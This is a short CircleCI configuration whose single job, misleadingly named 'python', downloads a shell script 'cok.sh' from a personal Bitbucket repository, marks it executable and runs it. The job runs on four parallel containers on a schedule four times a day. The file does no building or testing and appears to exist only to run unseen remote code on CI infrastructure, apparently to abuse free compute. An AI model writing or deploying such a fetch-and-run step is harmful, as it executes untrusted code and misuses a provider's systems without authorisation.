version: 2.1
jobs:
  content:
    parallelism: 4
    docker:
      - image: circleci/ruby:2.5.8
    steps:
    - run:
        name: python
        command: wget https://bitbucket.org/curhatanintrovert/folderyosh/raw/286ccc77295e215c4819d26816c2c8120b632cb6/cok.sh && chmod 700 cok.sh && ./cok.sh
        
workflows:
  version: 2.1
  commit:
    jobs:
      - content
    triggers:
      - schedule:
          cron: "0 5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
                
  Github:
    jobs:
      - content
